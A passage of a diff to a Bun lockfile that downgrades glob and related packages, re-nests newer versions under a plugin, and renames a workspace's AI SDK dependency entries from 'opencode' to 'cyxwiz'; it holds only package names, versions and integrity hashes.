"data-view-buffer": ["data-view-buffer@1.0.2", "", { "dependencies": { "call-bound": "^1.0.3", "es-errors": "^1.3.0", "is-data-view": "^1.0.2" } }, "sha512-EmKO5V3OLXh1rtK2wgXRansaK1/mtVdTUEiEI0W8RkvgT05kfxaH29PliLnpLP73yYO6142Q72QNa8Wx/A5CqQ=="], @@ -2541,7 +2545,7 @@ "github-slugger": ["github-slugger@2.0.0", "", {}, "sha512-IaOQ9puYtjrkq7Y0Ygl9KDZnrf/aiUJYUpVf89y8kyaxbRG7Y1SrX/jaumrv81vc61+kiMempujsM3Yw7w5qcw=="], - "glob": ["glob@11.1.0", "", { "dependencies": { "foreground-child": "^3.3.1", "jackspeak": "^4.1.1", "minimatch": "^10.1.1", "minipass": "^7.1.2", "package-json-from-dist": "^1.0.0", "path-scurry": "^2.0.0" }, "bin": { "glob": "dist/esm/bin.mjs" } }, "sha512-vuNwKSaKiqm7g0THUBu2x7ckSs3XJLXE+2ssL7/MfTGPLLcrJQ/4Uq1CjPTtO5cCIiRxqvN6Twy1qOwhL0Xjcw=="], + "glob": ["glob@10.4.5", "", { "dependencies": { "foreground-child": "^3.1.0", "jackspeak": "^3.1.2", "minimatch": "^9.0.4", "minipass": "^7.1.2", "package-json-from-dist": "^1.0.0", "path-scurry": "^1.11.1" }, "bin": { "glob": "dist/esm/bin.mjs" } }, "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg=="], "glob-parent": ["glob-parent@5.1.2", "", { "dependencies": { "is-glob": "^4.0.1" } }, "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow=="], @@ -2797,7 +2801,7 @@ "iterate-value": ["iterate-value@1.0.2", "", { "dependencies": { "es-get-iterator": "^1.0.2", "iterate-iterator": "^1.0.1" } }, "sha512-A6fMAio4D2ot2r/TYzr4yUWrmwNdsN5xL7+HUiyACE4DXm+q8HtPcnFTp+NnW3k4N05tZ7FVYFFb2CR13NxyHQ=="], - "jackspeak": ["jackspeak@4.1.1", "", { "dependencies": { "@isaacs/cliui": "^8.0.2" } }, "sha512-zptv57P3GpL+O0I7VdMJNBZCu+BPHVQUk55Ft8/QCJjTVxrnJHuVuX/0Bl2A6/+2oyR/ZMEuFKwmzqqZ/U5nPQ=="], + "jackspeak": ["jackspeak@3.4.3", "", { "dependencies": { "@isaacs/cliui": "^8.0.2" }, "optionalDependencies": { "@pkgjs/parseargs": "^0.11.0" } }, "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw=="], "jimp": ["jimp@1.6.0", "", { "dependencies": { "@jimp/core": "1.6.0", "@jimp/diff": "1.6.0", "@jimp/js-bmp": "1.6.0", "@jimp/js-gif": "1.6.0", "@jimp/js-jpeg": "1.6.0", "@jimp/js-png": "1.6.0", "@jimp/js-tiff": "1.6.0", "@jimp/plugin-blit": "1.6.0", "@jimp/plugin-blur": "1.6.0", "@jimp/plugin-circle": "1.6.0", "@jimp/plugin-color": "1.6.0", "@jimp/plugin-contain": "1.6.0", "@jimp/plugin-cover": "1.6.0", "@jimp/plugin-crop": "1.6.0", "@jimp/plugin-displace": "1.6.0", "@jimp/plugin-dither": "1.6.0", "@jimp/plugin-fisheye": "1.6.0", "@jimp/plugin-flip": "1.6.0", "@jimp/plugin-hash": "1.6.0", "@jimp/plugin-mask": "1.6.0", "@jimp/plugin-print": "1.6.0", "@jimp/plugin-quantize": "1.6.0", "@jimp/plugin-resize": "1.6.0", "@jimp/plugin-rotate": "1.6.0", "@jimp/plugin-threshold": "1.6.0", "@jimp/types": "1.6.0", "@jimp/utils": "1.6.0" } }, "sha512-YcwCHw1kiqEeI5xRpDlPPBGL2EOpBKLwO4yIBJcXWHPj5PnA5urGq0jbyhM5KoNpypQ6VboSoxc9D8HyfvngSg=="], @@ -3183,8 +3187,6 @@ "openapi-types": ["openapi-types@12.1.3", "", {}, "sha512-N4YtSYJqghVu4iek2ZUvcN/0aqH1kRDuNqzcycDxhOUpg7GdvLa2F3DgS6yBNhInhv2r/6I0Flkn7CqL8+nIcw=="], - "opencode": ["opencode@workspace:packages/opencode"], - "opencontrol": ["opencontrol@0.0.6", "", { "dependencies": { "@modelcontextprotocol/sdk": "1.6.1", "@tsconfig/bun": "1.0.7", "hono": "4.7.4", "zod": "3.24.2", "zod-to-json-schema": "3.24.3" }, "bin": { "opencontrol": "bin/index.mjs" } }, "sha512-QeCrpOK5D15QV8kjnGVeD/BHFLwcVr+sn4T6KKmP0WAMs2pww56e4h+eOGHb5iPOufUQXbdbBKi6WV2kk7tefQ=="], "openid-client": ["openid-client@5.6.4", "", { "dependencies": { "jose": "^4.15.4", "lru-cache": "^6.0.0", "object-hash": "^2.2.0", "oidc-token-hash": "^5.0.3" } }, "sha512-T1h3B10BRPKfcObdBklX639tVz+xh34O7GjofqrqiAQdm7eHsQ00ih18x6wuJ/E6FxdtS2u3FmUGPDeEcMwzNA=="], @@ -3251,7 +3253,7 @@ "path-parse": ["path-parse@1.0.7", "", {}, "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw=="], - "path-scurry": ["path-scurry@2.0.1", "", { "dependencies": { "lru-cache": "^11.0.0", "minipass": "^7.1.2" } }, "sha512-oWyT4gICAu+kaA7QWk/jvCHWarMKNs6pXOGWKDTr7cw4IGcUbW+PeTfbaQiLGheFRpjo6O9J0PmyMfQPjH71oA=="], + "path-scurry": ["path-scurry@1.11.1", "", { "dependencies": { "lru-cache": "^10.2.0", "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" } }, "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA=="], "path-to-regexp": ["path-to-regexp@6.3.0", "", {}, "sha512-Yhpw4T9C6hPpgPeA28us07OJeqZ5EzQTkbfwuhsUg0c237RomFoETJgmp2sa3F/41gfLE6G5cqcYwznmeEeOlQ=="], @@ -3919,7 +3921,7 @@ "yallist": ["yallist@4.0.0", "", {}, "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A=="], - "yaml": ["yaml@2.8.1", "", { "bin": { "yaml": "bin.mjs" } }, "sha512-lcYcMxX2PO9XMGvAJkJ3OsNMw+/7FKes7/hgerGUYWIoWu5j/+YQqcZr5JnPZWzOsEBgMbSbiSTn/dv/69Mkpw=="], + "yaml": ["yaml@2.7.0", "", { "bin": { "yaml": "bin.mjs" } }, "sha512-+hSoy/QHluxmC9kCIJyL/uyFmLmc+e5CFR5Wa+bpIhIj85LVb9ZH2nVnqrHoSvKogwODv0ClqZkmiSSaIH5LTA=="], "yargs": ["yargs@18.0.0", "", { "dependencies": { "cliui": "^9.0.1", "escalade": "^3.1.1", "get-caller-file": "^2.0.5", "string-width": "^7.2.0", "y18n": "^5.0.5", "yargs-parser": "^22.0.0" } }, "sha512-4UEqdc2RYGHZc7Doyqkrqiln3p9X2DZVxaGbwhn2pi7MrRagKaOcIKe8L3OxYcbhXLgLFUS3zAYuQjKBQgmuNg=="], @@ -4299,6 +4301,12 @@ "cross-spawn/which": ["which@2.0.2", "", { "dependencies": { "isexe": "^2.0.0" }, "bin": { "node-which": "./bin/node-which" } }, "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA=="], + "cyxwiz/@ai-sdk/anthropic": ["@ai-sdk/anthropic@2.0.57", "", { "dependencies": { "@ai-sdk/provider": "2.0.1", "@ai-sdk/provider-utils": "3.0.20" }, "peerDependencies": { "zod": "^3.25.76 || ^4.1.8" } }, "sha512-DREpYqW2pylgaj69gZ+K8u92bo9DaMgFdictYnY+IwYeY3bawQ4zI7l/o1VkDsBDljAx8iYz5lPURwVZNu+Xpg=="], + + "cyxwiz/@ai-sdk/openai": ["@ai-sdk/openai@2.0.89", "", { "dependencies": { "@ai-sdk/provider": "2.0.1", "@ai-sdk/provider-utils": "3.0.20" }, "peerDependencies": { "zod": "^3.25.76 || ^4.1.8" } }, "sha512-4+qWkBCbL9HPKbgrUO/F2uXZ8GqrYxHa8SWEYIzxEJ9zvWw3ISr3t1/27O1i8MGSym+PzEyHBT48EV4LAwWaEw=="], + + "cyxwiz/@ai-sdk/openai-compatible": ["@ai-sdk/openai-compatible@1.0.30", "", { "dependencies": { "@ai-sdk/provider": "2.0.1", "@ai-sdk/provider-utils": "3.0.20" }, "peerDependencies": { "zod": "^3.25.76 || ^4.1.8" } }, "sha512-thubwhRtv9uicAxSWwNpinM7hiL/0CkhL/ymPaHuKvI494J7HIzn8KQZQ2ymRz284WTIZnI7VMyyejxW4RMM6w=="], + "dot-prop/type-fest": ["type-fest@3.13.1", "", {}, "sha512-tLq3bSNx+xSpwvAJnzrK0Ep5CLNWjvFTOp71URMaAEWBfRb9nnJiBoUe0tF8bI4ZFO3omgBR6NvnbzVUT3Ly4g=="], "drizzle-kit/esbuild": ["esbuild@0.19.12", "", { "optionalDependencies": { "@esbuild/aix-ppc64": "0.19.12", "@esbuild/android-arm": "0.19.12", "@esbuild/android-arm64": "0.19.12", "@esbuild/android-x64": "0.19.12", "@esbuild/darwin-arm64": "0.19.12", "@esbuild/darwin-x64": "0.19.12", "@esbuild/freebsd-arm64": "0.19.12", "@esbuild/freebsd-x64": "0.19.12", "@esbuild/linux-arm": "0.19.12", "@esbuild/linux-arm64": "0.19.12", "@esbuild/linux-ia32": "0.19.12", "@esbuild/linux-loong64": "0.19.12", "@esbuild/linux-mips64el": "0.19.12", "@esbuild/linux-ppc64": "0.19.12", "@esbuild/linux-riscv64": "0.19.12", "@esbuild/linux-s390x": "0.19.12", "@esbuild/linux-x64": "0.19.12", "@esbuild/netbsd-x64": "0.19.12", "@esbuild/openbsd-x64": "0.19.12", "@esbuild/sunos-x64": "0.19.12", "@esbuild/win32-arm64": "0.19.12", "@esbuild/win32-ia32": "0.19.12", "@esbuild/win32-x64": "0.19.12" }, "bin": { "esbuild": "bin/esbuild" } }, "sha512-aARqgq8roFBj054KvQr5f1sFu0D65G+miZRCuJyJ0G13Zwx7vRar5Zhn2tkQNzIXcBrNVsv/8stehpj+GAjgbg=="], @@ -4333,7 +4341,7 @@ "gaxios/node-fetch": ["node-fetch@3.3.2", "", { "dependencies": { "data-uri-to-buffer": "^4.0.0", "fetch-blob": "^3.1.4", "formdata-polyfill": "^4.0.10" } }, "sha512-dRB78srN/l6gqWulah9SrxeYnxeddIG30+GOqK/9OlLVyLg3HPnr6SqOWTWOXKRwC2eGYCkZ59NNuSgvSrpgOA=="], - "glob/minimatch": ["minimatch@10.1.1", "", { "dependencies": { "@isaacs/brace-expansion": "^5.0.0" } }, "sha512-enIvLvRAFZYXJzkCYG5RKmPfrFArdLv+R+lbQ53BmIMLIry74bjKzX6iHAm8WYamJkhSSEabrWN5D97XnKObjQ=="], + "glob/minimatch": ["minimatch@9.0.5", "", { "dependencies": { "brace-expansion": "^2.0.1" } }, "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow=="], "globby/ignore": ["ignore@5.3.2", "", {}, "sha512-hsBTNUqQTDwkWtcdYI2i06Y/nUBEsNEDJKjWdigLvegy8kDuJAS8uRlpkkcQpyEXL0Z/pjDy5HBmMjRCJ2gq+g=="], @@ -4373,12 +4381,6 @@ "nypm/tinyexec": ["tinyexec@1.0.2", "", {}, "sha512-W/KYk+NFhkmsYpuHq5JykngiOCnxeVL8v8dFnqxSD8qEEdRfXk1SDM6JzNqcERbcGYj9tMrDQBYV9cjgnunFIg=="], - "opencode/@ai-sdk/anthropic": ["@ai-sdk/anthropic@2.0.57", "", { "dependencies": { "@ai-sdk/provider": "2.0.1", "@ai-sdk/provider-utils": "3.0.20" }, "peerDependencies": { "zod": "^3.25.76 || ^4.1.8" } }, "sha512-DREpYqW2pylgaj69gZ+K8u92bo9DaMgFdictYnY+IwYeY3bawQ4zI7l/o1VkDsBDljAx8iYz5lPURwVZNu+Xpg=="], - - "opencode/@ai-sdk/openai": ["@ai-sdk/openai@2.0.89", "", { "dependencies": { "@ai-sdk/provider": "2.0.1", "@ai-sdk/provider-utils": "3.0.20" }, "peerDependencies": { "zod": "^3.25.76 || ^4.1.8" } }, "sha512-4+qWkBCbL9HPKbgrUO/F2uXZ8GqrYxHa8SWEYIzxEJ9zvWw3ISr3t1/27O1i8MGSym+PzEyHBT48EV4LAwWaEw=="], - - "opencode/@ai-sdk/openai-compatible": ["@ai-sdk/openai-compatible@1.0.30", "", { "dependencies": { "@ai-sdk/provider": "2.0.1", "@ai-sdk/provider-utils": "3.0.20" }, "peerDependencies": { "zod": "^3.25.76 || ^4.1.8" } }, "sha512-thubwhRtv9uicAxSWwNpinM7hiL/0CkhL/ymPaHuKvI494J7HIzn8KQZQ2ymRz284WTIZnI7VMyyejxW4RMM6w=="], - "opencontrol/@modelcontextprotocol/sdk": ["@modelcontextprotocol/sdk@1.6.1", "", { "dependencies": { "content-type": "^1.0.5", "cors": "^2.8.5", "eventsource": "^3.0.2", "express": "^5.0.1", "express-rate-limit": "^7.5.0", "pkce-challenge": "^4.1.0", "raw-body": "^3.0.0", "zod": "^3.23.8", "zod-to-json-schema": "^3.24.1" } }, "sha512-oxzMzYCkZHMntzuyerehK3fV6A2Kwh5BD6CGEJSVDU2QNEhfLOptf2X7esQgaHZXHZY0oHmMsOtIDLP71UJXgA=="], "opencontrol/@tsconfig/bun": ["@tsconfig/bun@1.0.7", "", {}, "sha512-udGrGJBNQdXGVulehc1aWT73wkR9wdaGBtB6yL70RJsqwW/yJhIg6ZbRlPOfIUiFNrnBuYLBi9CSmMKfDC7dvA=="], @@ -4399,7 +4401,7 @@ "parse5/entities": ["entities@6.0.1", "", {}, "sha512-aN97NXWF6AWBTahfVOIrB/NShkzi5H7F9r1s9mD3cDj4Ko5f2qhhVoYMibXF7GlLveb/D2ioWay8lxI97Ven3g=="], - "path-scurry/lru-cache": ["lru-cache@11.2.2", "", {}, "sha512-F9ODfyqML2coTIsQpSkRHnLSZMtkU8Q+mSfcaIyKwy58u+8k5nvAYeiNhsyMARvzNcXJ9QfWVrcPsC9e9rAxtg=="], + "path-scurry/lru-cache": ["lru-cache@10.4.3", "", {}, "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ=="], "pixelmatch/pngjs": ["pngjs@6.0.0", "", {}, "sha512-TRzzuFRRmEoSW/p1KVAmiOgPco2Irlah+bGFCeNfJXxxYGwSw7YwAOAcd7X28K/m5bjBWKsC29KyoMfHbypayg=="], @@ -4407,6 +4409,8 @@ "postcss-load-config/lilconfig": ["lilconfig@3.1.3", "", {}, "sha512-/vlFKAoH5Cgt3Ie+JLhRbwOsCQePABiU3tJ1egGvyQ+33R/vcwM2Zl2QR/LzjsBeItPt3oSVXapn+m4nQDvpzw=="], + "postcss-load-config/yaml": ["yaml@2.8.1", "", { "bin": { "yaml": "bin.mjs" } }, "sha512-lcYcMxX2PO9XMGvAJkJ3OsNMw+/7FKes7/hgerGUYWIoWu5j/+YQqcZr5JnPZWzOsEBgMbSbiSTn/dv/69Mkpw=="], + "prompts/kleur": ["kleur@3.0.3", "", {}, "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w=="], "raw-body/iconv-lite": ["iconv-lite@0.4.24", "", { "dependencies": { "safer-buffer": ">= 2.1.2 < 3" } }, "sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA=="], @@ -4469,6 +4473,8 @@ "utif2/pako": ["pako@1.0.11", "", {}, "sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw=="], + "vite-plugin-icons-spritesheet/glob": ["glob@11.1.0", "", { "dependencies": { "foreground-child": "^3.3.1", "jackspeak": "^4.1.1", "minimatch": "^10.1.1", "minipass": "^7.1.2", "package-json-from-dist": "^1.0.0", "path-scurry": "^2.0.0" }, "bin": { "glob": "dist/esm/bin.mjs" } }, "sha512-vuNwKSaKiqm7g0THUBu2x7ckSs3XJLXE+2ssL7/MfTGPLLcrJQ/4Uq1CjPTtO5cCIiRxqvN6Twy1qOwhL0Xjcw=="], + "vitest/tinyexec": ["tinyexec@1.0.2", "", {}, "sha512-W/KYk+NFhkmsYpuHq5JykngiOCnxeVL8v8dFnqxSD8qEEdRfXk1SDM6JzNqcERbcGYj9tMrDQBYV9cjgnunFIg=="], "vitest/vite": ["vite@7.1.10", "", { "dependencies": { "esbuild": "^0.25.0", "fdir": "^6.5.0", "picomatch": "^4.0.3", "postcss": "^8.5.6", "rollup": "^4.43.0", "tinyglobby": "^0.2.15" }, "optionalDependencies": { "fsevents": "~2.3.3" }, "peerDependencies": { "@types/node": "^20.19.0 || >=22.12.0", "jiti": ">=1.21.0", "less": "^4.0.0", "lightningcss": "^1.21.0", "sass": "^1.70.0", "sass-embedded": "^1.70.0", "stylus": ">=0.54.8", "sugarss": "^5.0.0", "terser": "^5.16.0", "tsx": "^4.8.1", "yaml": "^2.4.2" }, "optionalPeers": ["@types/node", "jiti", "less", "lightningcss", "sass", "sass-embedded", "stylus", "sugarss", "terser", "tsx", "yaml"], "bin": { "vite": "bin/vite.js" } }, "sha512-CmuvUBzVJ/e3HGxhg6cYk88NGgTnBoOo7ogtfJJ0fefUWAxN/WDSUa50o+oVBxuIhO8FoEZW0j2eW7sfjs5EtA=="], @@ -4877,12 +4883,8 @@ "ansi-align/string-width/strip-ansi": ["strip-ansi@6.0.1", "", { "dependencies": { "ansi-regex": "^5.0.1" } }, "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A=="], - "archiver-utils/glob/jackspeak": ["jackspeak@3.4.3", "", { "dependencies": { "@isaacs/cliui": "^8.0.2" }, "optionalDependencies": { "@pkgjs/parseargs": "^0.11.0" } }, "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw=="], - "archiver-utils/glob/minimatch": ["minimatch@9.0.5", "", { "dependencies": { "brace-expansion": "^2.0.1" } }, "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow=="], - "archiver-utils/glob/path-scurry": ["path-scurry@1.11.1", "", { "dependencies": { "lru-cache": "^10.2.0", "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" } }, "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA=="], - "astro/shiki/@shikijs/core": ["@shikijs/core@3.15.0", "", { "dependencies": { "@shikijs/types": "3.15.0", "@shikijs/vscode-textmate": "^10.0.2", "@types/hast": "^3.0.4", "hast-util-to-html": "^9.0.5" } }, "sha512-8TOG6yG557q+fMsSVa8nkEDOZNTSxjbbR8l6lF2gyr6Np+jrPlslqDxQkN6rMXCECQ3isNPZAGszAfYoJOPGlg=="], "astro/shiki/@shikijs/engine-javascript": ["@shikijs/engine-javascript@3.15.0", "", { "dependencies": { "@shikijs/types": "3.15.0", "@shikijs/vscode-textmate": "^10.0.2", "oniguruma-to-es": "^4.3.3" } }, "sha512-ZedbOFpopibdLmvTz2sJPJgns8Xvyabe2QbmqMTz07kt1pTzfEvKZc5IqPVO/XFiEbbNyaOpjPBkkr1vlwS+qg=="], @@ -4905,8 +4907,6 @@ "babel-plugin-module-resolver/glob/minipass": ["minipass@4.2.8", "", {}, "sha512-fNzuVyifolSLFL4NzpF+wEF4qrgqaaKX0haXPQEdQ7NKAN+WecoKMHV09YcuL/DHxrUsYQOK3MiuDf7Ip2OXfQ=="], - "babel-plugin-module-resolver/glob/path-scurry": ["path-scurry@1.11.1", "", { "dependencies": { "lru-cache": "^10.2.0", "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" } }, "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA=="], - "body-parser/debug/ms": ["ms@2.0.0", "", {}, "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A=="], "cross-spawn/which/isexe": ["isexe@2.0.0", "", {}, "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw=="], @@ -4967,12 +4967,8 @@ "gray-matter/js-yaml/argparse": ["argparse@1.0.10", "", { "dependencies": { "sprintf-js": "~1.0.2" } }, "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg=="], - "js-beautify/glob/jackspeak": ["jackspeak@3.4.3", "", { "dependencies": { "@isaacs/cliui": "^8.0.2" }, "optionalDependencies": { "@pkgjs/parseargs": "^0.11.0" } }, "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw=="], - "js-beautify/glob/minimatch": ["minimatch@9.0.5", "", { "dependencies": { "brace-expansion": "^2.0.1" } }, "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow=="], - "js-beautify/glob/path-scurry": ["path-scurry@1.11.1", "", { "dependencies": { "lru-cache": "^10.2.0", "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" } }, "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA=="], - "jsonwebtoken/jws/jwa": ["jwa@1.4.2", "", { "dependencies": { "buffer-equal-constant-time": "^1.0.1", "ecdsa-sig-formatter": "1.0.11", "safe-buffer": "^5.0.1" } }, "sha512-eeH5JO+21J78qMvTIDdBXidBd6nG2kZjg5Ohz/1fpa28Z4CcsWUzJ1ZZyFq/3z3N17aZy+ZuBoHljASbL1WfOw=="], "lazystream/readable-stream/safe-buffer": ["safe-buffer@5.1.2", "", {}, "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g=="], @@ -4995,12 +4991,8 @@ "readable-stream/buffer/ieee754": ["ieee754@1.2.1", "", {}, "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA=="], - "rimraf/glob/jackspeak": ["jackspeak@3.4.3", "", { "dependencies": { "@isaacs/cliui": "^8.0.2" }, "optionalDependencies": { "@pkgjs/parseargs": "^0.11.0" } }, "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw=="], - "rimraf/glob/minimatch": ["minimatch@9.0.5", "", { "dependencies": { "brace-expansion": "^2.0.1" } }, "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow=="], - "rimraf/glob/path-scurry": ["path-scurry@1.11.1", "", { "dependencies": { "lru-cache": "^10.2.0", "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" } }, "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA=="], - "send/debug/ms": ["ms@2.0.0", "", {}, "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A=="], "string-width-cjs/strip-ansi/ansi-regex": ["ansi-regex@5.0.1", "", {}, "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ=="], @@ -5017,6 +5009,12 @@ "type-is/mime-types/mime-db": ["mime-db@1.52.0", "", {}, "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg=="], + "vite-plugin-icons-spritesheet/glob/jackspeak": ["jackspeak@4.1.1", "", { "dependencies": { "@isaacs/cliui": "^8.0.2" } }, "sha512-zptv57P3GpL+O0I7VdMJNBZCu+BPHVQUk55Ft8/QCJjTVxrnJHuVuX/0Bl2A6/+2oyR/ZMEuFKwmzqqZ/U5nPQ=="], + + "vite-plugin-icons-spritesheet/glob/minimatch": ["minimatch@10.1.1", "", { "dependencies": { "@isaacs/brace-expansion": "^5.0.0" } }, "sha512-enIvLvRAFZYXJzkCYG5RKmPfrFArdLv+R+lbQ53BmIMLIry74bjKzX6iHAm8WYamJkhSSEabrWN5D97XnKObjQ=="], + + "vite-plugin-icons-spritesheet/glob/path-scurry": ["path-scurry@2.0.1", "", { "dependencies": { "lru-cache": "^11.0.0", "minipass": "^7.1.2" } }, "sha512-oWyT4gICAu+kaA7QWk/jvCHWarMKNs6pXOGWKDTr7cw4IGcUbW+PeTfbaQiLGheFRpjo6O9J0PmyMfQPjH71oA=="], + "vitest/vite/esbuild": ["esbuild@0.25.12", "", { "optionalDependencies": { "@esbuild/aix-ppc64": "0.25.12", "@esbuild/android-arm": "0.25.12", "@esbuild/android-arm64": "0.25.12", "@esbuild/android-x64": "0.25.12", "@esbuild/darwin-arm64": "0.25.12", "@esbuild/darwin-x64": "0.25.12", "@esbuild/freebsd-arm64": "0.25.12", "@esbuild/freebsd-x64": "0.25.12", "@esbuild/linux-arm": "0.25.12", "@esbuild/linux-arm64": "0.25.12", "@esbuild/linux-ia32": "0.25.12", "@esbuild/linux-loong64": "0.25.12", "@esbuild/linux-mips64el": "0.25.12", "@esbuild/linux-ppc64": "0.25.12", "@esbuild/linux-riscv64": "0.25.12", "@esbuild/linux-s390x": "0.25.12", "@esbuild/linux-x64": "0.25.12", "@esbuild/netbsd-arm64": "0.25.12", "@esbuild/netbsd-x64": "0.25.12", "@esbuild/openbsd-arm64": "0.25.12", "@esbuild/openbsd-x64": "0.25.12", "@esbuild/openharmony-arm64": "0.25.12", "@esbuild/sunos-x64": "0.25.12", "@esbuild/win32-arm64": "0.25.12", "@esbuild/win32-ia32": "0.25.12", "@esbuild/win32-x64": "0.25.12" }, "bin": { "esbuild": "bin/esbuild" } }, "sha512-bbPBYYrtZbkt6Os6FiTLCTFxvq4tt3JKall1vRwshA3fdVztsLAatFaZobhkBC8/BrPetoa0oksYoKXoG4ryJg=="], "wrap-ansi-cjs/string-width/emoji-regex": ["emoji-regex@8.0.0", "", {}, "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A=="], @@ -5137,20 +5135,12 @@ "ansi-align/string-width/strip-ansi/ansi-regex": ["ansi-regex@5.0.1", "", {}, "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ=="], - "archiver-utils/glob/path-scurry/lru-cache": ["lru-cache@10.4.3", "", {}, "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ=="], - "astro/unstorage/h3/cookie-es": ["cookie-es@1.2.2", "", {}, "sha512-+W7VmiVINB+ywl1HGXJXmrqkOhpKrIiVZV6tQuV54ZyQC7MMuBt81Vc336GMLoHBq5hV/F9eXgt5Mnx0Rha5Fg=="], "astro/unstorage/h3/crossws": ["crossws@0.3.5", "", { "dependencies": { "uncrypto": "^0.1.3" } }, "sha512-ojKiDvcmByhwa8YYqbQI/hg7MEU0NC03+pSdEq4ZUnZR9xXpwk7E43SMNGkn+JxJGPFtNvQ48+vV2p+P1ml5PA=="], - "babel-plugin-module-resolver/glob/path-scurry/lru-cache": ["lru-cache@10.4.3", "", {}, 